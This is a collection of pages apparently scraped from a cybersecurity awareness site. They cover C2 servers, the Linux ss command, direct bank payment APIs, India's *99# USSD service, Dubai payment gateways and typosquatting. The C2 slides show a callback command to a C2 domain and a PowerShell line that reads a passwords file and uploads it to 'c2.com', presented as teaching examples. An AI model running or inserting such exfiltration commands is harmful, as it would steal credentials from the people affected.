The Attack Cycle This shows the data theft process. ⚠ 1. Infection A victim clicks a bad link. The computer downloads malware. The malware hides. 📡 2. Callback The malware calls the server. The hacker waits there. The hacker sends orders. 🔓 3. Theft The server gives a command. The malware steals data. The malware locks files. Ethical Hacker Zone ⚠ Educational Use Only Welcome to this presentation. We study C2 servers today. C2 servers control cyber attacks. We learn attacker methods. This knowledge builds strong defenses. What is a C2 Server? A C2 server is a hacker base. It sends instructions to computers. It receives stolen data. The Mirai botnet used C2 servers. The botnet controlled smart cameras. The Infection Process Hackers send bad emails. A victim opens a bad file. The malware installs in secret. The malware calls the C2 server. Experts call this connection the callback. Educational Code: Callback Hackers write connection scripts. They hide this web traffic. The malware asks for a task. // Malware asks for instructions curl -X GET https://hidden-c2.com/get_task // Server replies: “Download Keylogger” Educational Code: Theft Exfiltration means data theft. Hackers steal passwords. They upload the data. They encrypt the data. Firewalls cannot read encrypted data. # Exfiltration Example $Data = Get-Content -Path “C:Passwords.txt” Invoke-WebRequest -Uri “http://c2.com/upload” -Body $Data Disruption and Defense Security teams hunt C2 addresses. They block bad IP addresses. The firewall stops the connection. The malware stops working. Monitor your network logs daily.

Mastering ss -tuln | Ethical Hacker Zone 01. What is a Port? A port is a numeric identifier for a specific service. It acts like a digital door for your computer. Websites use Port 80. Secure logins use Port 22. 02. TCP vs UDP TCP is reliable and checks for errors. It is used for web browsing. UDP is extremely fast but does not check for errors. It is used for video games and streaming. 03. The ss -tuln Command This command lists all open listening ports. It pulls data directly from the Linux kernel. It is the fastest tool for network discovery. 04. Why Use This Tool? Hackers use it to find open doors. You can use it to find hidden malware backdoors. It also helps you verify if your web server is running correctly. 05. Professional Tips Use sudo ss -tulnp to see Process IDs. This shows exactly which program owns the port. Always switch from netstat to ss for modern Linux systems. © 2026 Developed by Kartick Dutta | Ethical Hacker Zone Institutional Grade Cybersecurity Training Portal

Custom Payment Gateways Direct Control: Money moves directly from client to your HDFC account. Instant Settlement: Achieve T+0 speed without 3rd party delays. No Middlemen: Bypass platforms like Razorpay or Cashfree entirely. Direct Bank API Setup Merchant API: Connect directly to HDFC or ICICI business servers. Safety First: Transactions are handled inside the bank’s secure network. T+0 Benefit: Funds are credited based on your direct bank contract. UPI: Zero Day Holding Dynamic QR: Generate a unique code for every single customer. Intent Flow: Automatically opens GPay/PhonePe on mobile devices. Real-time: Money hits your account the second the PIN is entered. Security & Requirements Checksum: Use SHA-256 to prevent hackers from tampering with data. Webhooks: Automated server alerts when a payment is successful. Compliance: Use Bank PSP pages to avoid complex PCI-DSS costs. ❮ ❯ What is an API? A Bridge: It connects your website to the bank. The Waiter: You give it an order, it goes to the kitchen (Bank), and brings back the food (Response). Interface: It allows two different computers to talk to each other. Website ↔ API ↔ Bank How the Flow Works Step 1 (Request): Your site tells the bank: “Collect ₹500 from this user.” Step 2 (Security): The API checks the SHA-256 digital seal to prevent fraud. Step 3 (Response): The bank says “Success” and moves money to your account. Why Use Direct APIs? T+0 Settlement: Money goes to your HDFC account instantly. No Holding: Third parties (Razorpay/Cashfree) won’t hold your money for days. Higher Trust: Your website works directly with a trusted bank. The Code: Python import requests # The Bank’s API Address api_url = “https://api.hdfcbank.com/v1/pay” data = { “merchant_id”: “YOUR_ID”, “amount”: “500.00”, “hash”: “SHA-256_SEAL” } # Sending the request response = requests.post(api_url, data=data) print(response.text) The Code: PHP <?php $url = “https://api.hdfcbank.com/v1/pay”; $data = [ “merchant_id” => “YOUR_ID”, “amount” => “500.00” ]; $ch = curl_init($url); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $result = curl_exec($ch); echo $result; ?> Back Next Quick Quiz: API & Security Question: If a hacker tries to change the payment amount during a transaction, which technology will alert the bank? A) The Website Logo B) SHA-256 Digital Seal (Hash) C) The User’s Browser History

NPCI Digital Initiative *99#: The Universal USSD Banking Solution for India In a significant move towards financial inclusion, the National Payments Corporation of India (NPCI) launched the *99# service. This USSD-based mobile banking initiative is designed to bring banking services to every corner of India, bridging the digital divide by removing the dependency on high-end technology. [Image of USSD banking workflow in India] What is *99# Service? The *99# service is a unique “Unstructured Supplementary Service Data” (USSD) channel that allows customers to access their bank accounts and perform financial transactions using a basic GSM mobile handset. Unlike modern banking apps, this service does not require an active internet connection or a smartphone. “One Code, Many Banks: Dial *99# from your registered mobile number to access interbank financial services instantly.” Key Features and Benefits No Internet Required: Works on voice connectivity, making it ideal for rural and remote areas. Works on All Handsets: Compatible with everything from a basic ₹1,000 feature phone to the latest iPhone. 24/7 Availability: Accessible anytime, including Sundays and public holidays. Multi-lingual Support: Available in 13 different Indian languages to ensure ease of use for everyone. Interbank Transfers: Supports funds transfer using Mobile Number & MMID or Account Number & IFSC. How to Get Started To use this service, follow these simple steps: Dial *99# from the mobile number registered with your bank. Enter your bank’s name or the first 4 digits of your IFSC. Select the service you need (Balance Enquiry, Mini Statement, or Fund Transfer). Authenticate the transaction using your UPI PIN. Available Services Through the *99# menu, users can perform both financial and non-financial tasks, including: Balance Enquiry and Mini Statement Fund Transfer (UPI, Account Number, or Aadhaar) Change or Reset UPI PIN Check Aadhaar Linking Status with Bank Account Note: While the service is highly accessible, telecom service providers may apply a small nominal charge for USSD sessions as per TRAI guidelines. Please check with your operator for specific tariff details.

Top Dubai Payment Gateways for Business – Instant, Secure & Multi-currency Top Dubai Payment Gateways – Instant, Secure & Multi-currency Support A quick comparison of DubaiPay, Aani, MamoPay, Geidea, Tap Payments, and CCAvenue UAE ⏱ 🔒 🌎 📈 INSTANT PAYMENT GLOBAL CURRENCY SECURE 2D UAE BUSINESS Looking for the best payment gateway in Dubai? Every modern business needs fast transfer, seamless security, and worldwide payment support to thrive. Top gateways such as DubaiPay, Aani, MamoPay, Geidea, Tap Payments, CCAvenue UAE offer instant settlements, 2D Secure authentication, and multi-currency checkout—giving your business a boost in trust, customer reach, and cash flow. Name InstantSettlement 2DSecure Multi-currencySupport Best For / Details DubaiPay Yes Yes Limited(mainly AED) Fast, secure local payments in UAE. Accepts AED, limited global currencies. Aani (Dubai Islamic Bank) Yes Yes Yes Instant, accepts multiple currencies.Islamic banking & worldwide reach. MamoPay Yes Yes Yes Same-day payout, easy for global users.Mobile-focused, simple & trusted. Geidea Yes Yes Yes Supports USD, EUR, GBP.Robust multi-currency, advanced tools. Tap Payments Yes Yes Yes Worldwide payments handled with ease.Fast transfers, global reach features. CCAvenue UAE Yes Yes Yes Handles INR, AED, USD, and more.Best for India-UAE business links. Take your UAE business global with the right payment gateway! Fast, secure, and global multi-currency support is just a click away. Article Author: KARTICK DUTTA Certified Cyber Security Analyst & CE-CRT Security Expert | Professional payment gateway guide writer For any inquiry or consultancy in digital payments & web security, connect now! duttakartick8@gmail.com | www.ethicalhackerzone.com

Typosquatting & Typoglycemia: How Hackers Trick Your Brain Typosquatting & Typoglycemia: How Hackers Trick Your Brain with Lookalike Domains Have you ever typed a website address wrong but still ended up on a site that looks real? This is not a coincidence — it’s a cyberattack called typosquatting. Attackers exploit a brain phenomenon called typoglycemia to trick you into visiting fake websites. 🔎 What Is Typosquatting? Typosquatting is when hackers register domain names that look almost identical to popular websites. They might: Add an extra character (e.g., googgle.com instead of google.com) Swap letters (e.g., amazno.com instead of amazon.com) Insert hyphens (e.g., face-book.com instead of facebook.com) 🧠 What Is Typoglycemia? The Brain Phenomenon Behind Reading Scrambled Words Typoglycemia is the brain’s ability to read words even when their middle letters are scrambled, as long as the first and last letters stay in place. Our brains recognize word shapes, not letters one by one. 📖 History of Typoglycemia The term typoglycemia became popular after a viral 2003 email that falsely claimed a “Cambridge University study.” The example text (“Aoccdrnig to a rscheearch at Cmabrigde…”) showed how people can read jumbled words easily. Cognitive psychology later explained this happens because of parallel letter recognition and top-down processing, where our brain guesses words by context and shape. ⚠️ Dangers of Typosquatting & Typoglycemia Stealing your login information Installing malware or ransomware Collecting personal or financial data Spreading scams and phishing attacks ✅ How to Protect Yourself Always double-check website URLs before entering sensitive information. Use bookmarks or password managers to access trusted sites. Install browser extensions that detect suspicious domains. Enable multi-factor authentication on your accounts. Keep your software and antivirus updated. 📸 Example of Typoglycemia in Action This example shows how easily our brains read scrambled words, making typosquatting effective: 🔗 Learn More About Cognitive Vulnerabilities For a deep dive into how dark psychology exploits cognitive biases like typoglycemia, visit our partner site Cognitive Veil. 📚 Final Thoughts Understanding typoglycemia and typosquatting can help you stay alert online. Our brains are powerful but can be fooled. Always check URLs and think before you click to stay safe! 🔗 Back to Ethical Hacker Zone Home

Typosquatting Visual Awareness Typosquatting and Brain Tricks: Cyber Awareness Guide Typosquatting: How Your Brain Can Be Tricked by a Lookalike Domain ⚠ What is Typosquatting? Typosquatting is a cyber tactic where attackers register domain names that look visually similar to real websites — such as adding an extra character, swapping letters, or adding hyphens — to mislead users into thinking they’re on the real site. The human brain is trained to recognize patterns quickly. This helps us read fast, but it also makes us vulnerable to digital deception. In cybersecurity, this phenomenon is known as visual spoofing or brand impersonation. For example, imagine two websites: realbanksecure.com ← safe realbannksecure.com ← trick Most users won’t notice the subtle difference unless they’re paying close attention. This is especially dangerous when combined with similar logos, page layout, and even favicons (the small icon in the browser tab). Pattern Recognition: Our brain often overlooks small typos if the start and end are correct. Familiarity Bias: A known color scheme and logo make us trust the site faster. Speed Browsing: On phones and in a rush, people don’t analyze URLs carefully. This tactic is frequently used in phishing campaigns, where users enter their login details on fake pages without realizing it. ✅ Cyber Awareness Tips Always double-check the spelling of domain names. Use bookmarks for critical sites like banking, social media, or payments. Enable two-factor authentication (2FA) wherever possible. Look out for design differences, odd language, or broken links. As ethical hackers and digital defenders, it’s our job to educate others about these subtle traps. Stay alert, stay informed — and don’t let your brain fool you. This post is for cybersecurity awareness and educational purposes only. It does not represent or impersonate any specific brand. 🛡️ Article Written By Kartick Dutta Indian Cyber Security Expert & Certified Ethical Hacker 📧 Email: certifiedethicalhacker.contacts@gmail.com 📞 Contact: +91 94321 71707 Call or email for cybersecurity services and consultations.